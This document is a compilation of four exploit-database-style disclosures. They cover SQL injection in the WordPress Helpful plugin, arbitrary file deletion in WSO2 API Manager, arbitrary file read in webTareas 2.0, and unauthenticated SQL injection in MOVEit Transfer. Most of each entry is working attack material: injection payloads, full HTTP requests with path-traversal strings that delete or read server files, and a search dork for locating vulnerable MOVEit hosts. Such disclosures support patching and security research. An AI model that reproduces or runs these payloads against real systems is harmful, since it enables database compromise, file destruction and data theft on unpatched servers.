Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin Version : 2.4.11 Software Link : https://wordpress.org/plugins/helpful/ Date of found: 10.04.2019 Author: Numan Türle core/Core.class.php // Ajax requests: pro add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) ); // set args for insert command $args = array( 'post_id' => $_REQUEST['post_id'], 'user' => $_REQUEST['user'], 'pro' => $_REQUEST['pro'], 'contra' => $_REQUEST['contra'] ); $result = $this->insert( $args ); @params = 'post_id' => $_REQUEST['post_id'], call function insert --> if( !$args['post_id'] ) return false; $check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id"); Payload : GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1

# Title: WSO2 3.1.0 - Arbitrary File Delete # Date: 2020-04-12 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A Document Title: =============== WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) ##CVE not assigned yet ##Security Update : https://apim.docs.wso2.com/en/latest/ Common Vulnerability Scoring System: ==================================== 8.5 Affected Product(s): ==================== WSO2 API Manager Carbon Interface Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests and to delete arbitrary System files. The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. =============================== Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) [2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d eployment\server\registryextensions\commons-dir at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j ava:531) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] at org.apache.axis2.client.OperationClient.execute(OperationClient.java: 149) ~[axis2_1.6.1.wso2v38.jar:?] at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte nsions.stub_4.7.13.jar:?] at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens ions.ui_4.7.13.jar:?] at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t omcat_9.0.22.wso2v1.jar:?] *Error displayed in Web browser with body request: <script type="text/javascript"> CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar"); </script> ============================= Request Method(s): [+] POST Vulnerable Module(s): [+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp Vulnerable Parameter(s): [+] extensionName Server version 3.0.0 Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) 2-attacker uploads any file .jar extension 3-attacker intercepts the request that follows and modifies the parameter with traversal string: --- PoC Session Logs [POST] --- POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 Host: localhost:9443 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS Content-Length: 22 Origin: https://localhost:9443 Connection: close Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions Pragma: no-cache Cache-Control: no-cache extensionName=../../../../INSTALL.txt ---------------Returned Headers in Response------------------ HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Content-Type: text/html;charset=UTF-8 Content-Length: 10 Date: Sat, 04 Jan 2020 00:55:38 GMT Connection: close Server: WSO2 Carbon Server

# Exploit Title: Webtateas 2.0 - Arbitrary File Read # Date: 2020-04-12 # Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. # Vendor Homepage: http://webtareas.sourceforge.net/general/home.php # Software Link: http://webtareas.sourceforge.net/general/home.php # Version: Webtateas v2.0 # Tested on: Windows # CVE : N/A Vulnerable Request: POST /webtareas/includes/general_serv.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 72 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/general/home.php? Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver DNT: 1 action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini

# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection # Google Dork: inurl:human.aspx intext:moveit # Date: 2020-04-12 # Exploit Authors: Aviv Beniash, Noam Moshe # Vendor Homepage: https://www.ipswitch.com/ # Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 # CVE : CVE-2019-16383 # # Related Resources: # https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability # https://nvd.nist.gov/vuln/detail/CVE-2019-16383 # Description: # The API call for revoking logon tokens is vulnerable to a # Time based blind SQL injection via the 'token' parameter # MSSQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 32 token='; WAITFOR DELAY '0:0:10'-- # MySQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 21 token=' OR SLEEP(10);